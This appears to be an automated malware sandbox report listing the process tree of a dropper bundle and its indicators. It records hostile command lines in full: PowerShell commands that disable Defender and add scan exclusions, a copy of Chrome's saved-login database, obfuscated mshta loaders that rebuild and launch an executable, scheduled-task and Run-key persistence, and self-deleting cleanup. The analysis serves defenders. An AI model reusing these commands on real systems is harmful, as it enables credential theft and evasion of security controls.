8632 | MicrosoftEdgeCP.exe
7624 | MicrosoftEdge.exe
6604 | MicrosoftEdgeCP.exe
6604 | MicrosoftEdgeCP.exe
1056 | MicrosoftEdge.exe
5820 | MicrosoftEdgeCP.exe
5820 | MicrosoftEdgeCP.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: setup_x86_x64_install.exe, setup_installer.exe, setup_install.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe
description | pid | process | target process
PID 3820 wrote to memory of 4392 | 3820 | setup_x86_x64_install.exe | setup_installer.exe
PID 3820 wrote to memory of 4392 | 3820 | setup_x86_x64_install.exe | setup_installer.exe
PID 3820 wrote to memory of 4392 | 3820 | setup_x86_x64_install.exe | setup_installer.exe
PID 4392 wrote to memory of 3236 | 4392 | setup_installer.exe | setup_install.exe
PID 4392 wrote to memory of 3236 | 4392 | setup_installer.exe | setup_install.exe
PID 4392 wrote to memory of 3236 | 4392 | setup_installer.exe | setup_install.exe
PID 3236 wrote to memory of 408 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 408 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 408 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 700 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 700 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 700 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1064 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1064 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1064 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1164 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1164 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1164 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1240 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1240 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1240 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1328 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1328 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1328 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1456 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1456 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1456 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1520 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1520 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1520 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1596 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1596 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1596 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1788 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1788 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 1788 | 3236 | setup_install.exe | cmd.exe
PID 700 wrote to memory of 1812 | 700 | cmd.exe | powershell.exe
PID 700 wrote to memory of 1812 | 700 | cmd.exe | powershell.exe
PID 700 wrote to memory of 1812 | 700 | cmd.exe | powershell.exe
PID 408 wrote to memory of 1988 | 408 | cmd.exe | powershell.exe
PID 408 wrote to memory of 1988 | 408 | cmd.exe | powershell.exe
PID 408 wrote to memory of 1988 | 408 | cmd.exe | powershell.exe
PID 1064 wrote to memory of 1572 | 1064 | cmd.exe | Wed09f257bb7877d00b2.exe
PID 1064 wrote to memory of 1572 | 1064 | cmd.exe | Wed09f257bb7877d00b2.exe
PID 3236 wrote to memory of 2108 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 2108 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 2108 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 2372 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 2372 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 2372 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 2640 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 2640 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 2640 | 3236 | setup_install.exe | cmd.exe
PID 1164 wrote to memory of 2656 | 1164 | cmd.exe | Wed09b3a5ca1a712d390.exe
PID 1164 wrote to memory of 2656 | 1164 | cmd.exe | Wed09b3a5ca1a712d390.exe
PID 1164 wrote to memory of 2656 | 1164 | cmd.exe | Wed09b3a5ca1a712d390.exe
PID 3236 wrote to memory of 2764 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 2764 | 3236 | setup_install.exe | cmd.exe
PID 3236 wrote to memory of 2764 | 3236 | setup_install.exe | cmd.exe
PID 1328 wrote to memory of 2484 | 1328 | cmd.exe | Wed096a1bff61.exe
PID 1328 wrote to memory of 2484 | 1328 | cmd.exe | Wed096a1bff61.exe
PID 1240 wrote to memory of 3416 | 1240 | cmd.exe | Wed09d8d6edfaff2ac.exe
PID 1240 wrote to memory of 3416 | 1240 | cmd.exe | Wed09d8d6edfaff2ac.exe
PID 1240 wrote to memory of 3416 | 1240 | cmd.exe | Wed09d8d6edfaff2ac.exe
Processes
(each entry: process tree level, image path, then the command line as recorded)
-
level 1: C:\Windows\Explorer.EXE
  cmd: C:\Windows\Explorer.EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
level 2: C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
- Suspicious use of WriteProcessMemory
-
level 3: C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
level 4: C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\setup_install.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\setup_install.exe"
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
- Suspicious use of WriteProcessMemory
-
level 6: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
- Suspicious use of WriteProcessMemory
-
level 6: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe
- Suspicious use of WriteProcessMemory
-
level 6: C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09f257bb7877d00b2.exe
  cmd: Wed09f257bb7877d00b2.exe
- Executes dropped EXE
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe
- Suspicious use of WriteProcessMemory
-
level 6: C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09b3a5ca1a712d390.exe
  cmd: Wed09b3a5ca1a712d390.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
level 7: C:\Users\Admin\AppData\Roaming\4825122.exe
  cmd: "C:\Users\Admin\AppData\Roaming\4825122.exe"
- Executes dropped EXE
-
level 7: C:\Users\Admin\AppData\Roaming\4080892.exe
  cmd: "C:\Users\Admin\AppData\Roaming\4080892.exe"
- Executes dropped EXE
-
level 7: C:\Users\Admin\AppData\Roaming\6776654.exe
  cmd: "C:\Users\Admin\AppData\Roaming\6776654.exe"
- Executes dropped EXE
- Adds Run key to start application
-
level 8: C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
  cmd: "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
- Executes dropped EXE
-
level 7: C:\Users\Admin\AppData\Roaming\2482554.exe
  cmd: "C:\Users\Admin\AppData\Roaming\2482554.exe"
- Executes dropped EXE
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe
-
level 6: C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0971f17486f8.exe
  cmd: Wed0971f17486f8.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe
-
level 6: C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exe
  cmd: Wed0901eb1dae126e32.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe
-
level 6: C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09e95ff6b5.exe
  cmd: Wed09e95ff6b5.exe
-
level 7: C:\Users\Public\run.exe
  cmd: C:\Users\Public\run.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
level 8: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
-
level 8: C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 260
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
level 7: C:\Users\Public\run2.exe
  cmd: C:\Users\Public\run2.exe
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe
-
level 6: C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09c42cad92c20f79.exe
  cmd: Wed09c42cad92c20f79.exe
- Executes dropped EXE
-
level 7: C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3088753398.exe"
-
level 7: C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7466882224.exe"
-
level 7: C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09c42cad92c20f79.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09c42cad92c20f79.exe" & exit
-
level 8: C:\Windows\SysWOW64\taskkill.exe
  cmd: taskkill /im "Wed09c42cad92c20f79.exe" /f
- Kills process with taskkill
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone
-
level 6: C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09cfb2f9758281d8.exe
  cmd: Wed09cfb2f9758281d8.exe /mixone
- Executes dropped EXE
-
level 7: C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 660
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
level 7: C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 680
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
level 7: C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 684
- Program crash
-
level 7: C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 680
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
level 7: C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 940
- Program crash
-
level 7: C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1104
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed094c47c32b.exe
-
level 6: C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exe
  cmd: Wed094c47c32b.exe
- Executes dropped EXE
-
level 6: C:\Windows\SysWOW64\rundll32.exe
  cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Loads dropped DLL
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe
-
level 6: C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09b2a8bc4f16cb.exe
  cmd: Wed09b2a8bc4f16cb.exe
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed096a1bff61.exe
- Suspicious use of WriteProcessMemory
-
level 5: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe
- Suspicious use of WriteProcessMemory
-
level 2: C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\SysWOW64\cmd.exe"
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
level 3: C:\Windows\SysWOW64\cmd.exe
  cmd: /c del "C:\Users\Admin\Pictures\Adobe Films\ZzEa6lWClVPLFIq3UqymzBXh.exe"
-
level 3: C:\Windows\SysWOW64\cmd.exe
  cmd: /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
-
level 3: C:\Program Files\Mozilla Firefox\Firefox.exe
  cmd: "C:\Program Files\Mozilla Firefox\Firefox.exe"
-
level 2: C:\Windows\SysWOW64\rundll32.exe
  cmd: "C:\Windows\SysWOW64\rundll32.exe"
-
level 2: C:\Users\Admin\AppData\Local\Temp\9E51.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\9E51.exe
- Suspicious use of SetThreadContext
-
level 3: C:\Users\Admin\AppData\Local\Temp\9E51.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\9E51.exe
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
level 2: C:\Users\Admin\AppData\Local\Temp\D281.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\D281.exe
-
level 2: C:\Users\Admin\AppData\Local\Temp\D800.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\D800.exe
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
level 2: C:\Users\Admin\AppData\Local\Temp\EA22.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\EA22.exe
- Checks processor information in registry
-
level 3: C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im EA22.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EA22.exe" & del C:\ProgramData\*.dll & exit
-
level 4: C:\Windows\SysWOW64\taskkill.exe
  cmd: taskkill /im EA22.exe /f
- Kills process with taskkill
-
level 4: C:\Windows\SysWOW64\timeout.exe
  cmd: timeout /t 6
- Delays execution with timeout.exe
-
level 2: C:\Windows\system32\regsvr32.exe
  cmd: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\490.dll
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
-
level 2: C:\Users\Admin\AppData\Local\Temp\B48.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\B48.exe
-
level 2: C:\Users\Admin\AppData\Local\Temp\ED4D.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\ED4D.exe
- Suspicious use of SetThreadContext
-
level 3: C:\Users\Admin\AppData\Local\Temp\ED4D.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\ED4D.exe
- Adds Run key to start application
-
level 4: C:\Windows\SysWOW64\icacls.exe
  cmd: icacls "C:\Users\Admin\AppData\Local\f9056f7f-431e-4060-84c4-36a2a3c4afc4" /deny *S-1-1-0:(OI)(CI)(DE,DC)
- Modifies file permissions
-
level 4: C:\Users\Admin\AppData\Local\Temp\ED4D.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\ED4D.exe" --Admin IsNotAutoStart IsNotTask
- Suspicious use of SetThreadContext
-
level 5: C:\Users\Admin\AppData\Local\Temp\ED4D.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\ED4D.exe" --Admin IsNotAutoStart IsNotTask
-
level 6: C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build2.exe
  cmd: "C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build2.exe"
- Suspicious use of SetThreadContext
-
level 7: C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build2.exe
  cmd: "C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build2.exe"
- Checks processor information in registry
-
level 8: C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build2.exe" & del C:\ProgramData\*.dll & exit
-
level 9: C:\Windows\SysWOW64\taskkill.exe
  cmd: taskkill /im build2.exe /f
- Kills process with taskkill
-
level 9: C:\Windows\SysWOW64\timeout.exe
  cmd: timeout /t 6
- Delays execution with timeout.exe
-
level 6: C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build3.exe
  cmd: "C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build3.exe"
- Suspicious use of SetThreadContext
-
level 7: C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build3.exe
  cmd: "C:\Users\Admin\AppData\Local\956bd857-068e-4075-8d9d-45eee8a11bab\build3.exe"
-
level 8: C:\Windows\SysWOW64\schtasks.exe
  cmd: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
- Creates scheduled task(s)
-
level 2: C:\Users\Admin\AppData\Local\Temp\EEE4.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\EEE4.exe
- Checks processor information in registry
-
level 3: C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im EEE4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EEE4.exe" & del C:\ProgramData\*.dll & exit
- Loads dropped DLL
-
level 4: C:\Windows\SysWOW64\taskkill.exe
  cmd: taskkill /im EEE4.exe /f
- Kills process with taskkill
-
level 4: C:\Windows\SysWOW64\timeout.exe
  cmd: timeout /t 6
- Delays execution with timeout.exe
-
level 2: C:\Users\Admin\AppData\Local\Temp\F250.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\F250.exe
- Drops file in Program Files directory
-
level 2: C:\Users\Admin\AppData\Local\Temp\FB1B.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\FB1B.exe
-
level 3: C:\Windows\SysWOW64\mshta.exe
  cmd: "C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\FB1B.exe"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF """"=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\FB1B.exe"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )
-
level 4: C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\FB1B.exe" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF ""=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\FB1B.exe") do taskkill /iM "%~nXN" -f
-
level 5: C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE
  cmd: MXB89oH1.eXE /poMZbeSahrmSD~4GRjd
-
level 6: C:\Windows\SysWOW64\mshta.exe
  cmd: "C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF ""/poMZbeSahrmSD~4GRjd""=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )
-
level 7: C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF "/poMZbeSahrmSD~4GRjd"=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE") do taskkill /iM "%~nXN" -f
-
level 6: C:\Windows\SysWOW64\mshta.exe
  cmd: "C:\Windows\System32\mshta.exe" VbScRipt: cLosE (CREateoBJEcT ("wscRiPt.shElL"). ruN ( "cMD /q /r EcHO | SeT /p = ""MZ"" > 5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL + G2K6.CP+ P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ ", 0, TRue ) )
-
level 7: C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\System32\cmd.exe" /q /r EcHO | SeT /p = "MZ" >5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3+ TBFC27.HKL+G2K6.CP+P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ
-
level 8: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>5XGGA_QU.T"
-
level 8: C:\Windows\SysWOW64\cmd.exe
  cmd: C:\Windows\system32\cmd.exe /S /D /c" EcHO "
-
level 8: C:\Windows\SysWOW64\msiexec.exe
  cmd: msiexec.exe -y .\YFYnG.AJ
-
level 5: C:\Windows\SysWOW64\taskkill.exe
  cmd: taskkill /iM "FB1B.exe" -f
- Kills process with taskkill
-
level 2: C:\Users\Admin\AppData\Local\Temp\FDDB.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\FDDB.exe
-
level 2: C:\Program Files (x86)\Rprqhz\tjrixg4.exe
  cmd: "C:\Program Files (x86)\Rprqhz\tjrixg4.exe"
-
level 2: C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe"
-
level 1: c:\windows\system32\svchost.exe
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s BITS
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
level 2: C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k SystemNetworkService
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
level 2: C:\Windows\system32\regsvr32.exe
  cmd: regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\490.dll"
-
level 1: c:\windows\system32\svchost.exe
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Browser
-
level 1: c:\windows\system32\svchost.exe
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s WpnService
-
level 1: c:\windows\system32\svchost.exe
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
-
level 1: c:\windows\system32\svchost.exe
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
-
level 1: c:\windows\system32\svchost.exe
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
-
level 1: c:\windows\system32\svchost.exe
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
-
level 1: c:\windows\system32\svchost.exe
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s SENS
-
level 1: c:\windows\system32\svchost.exe
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s UserManager
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\cbwcirjC:\Users\Admin\AppData\Roaming\cbwcirj2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\cbwcirjC:\Users\Admin\AppData\Roaming\cbwcirj2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\uswcirjC:\Users\Admin\AppData\Roaming\uswcirj2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\fcwcirjC:\Users\Admin\AppData\Roaming\fcwcirj2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fcwcirjC:\Users\Admin\AppData\Roaming\fcwcirj3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
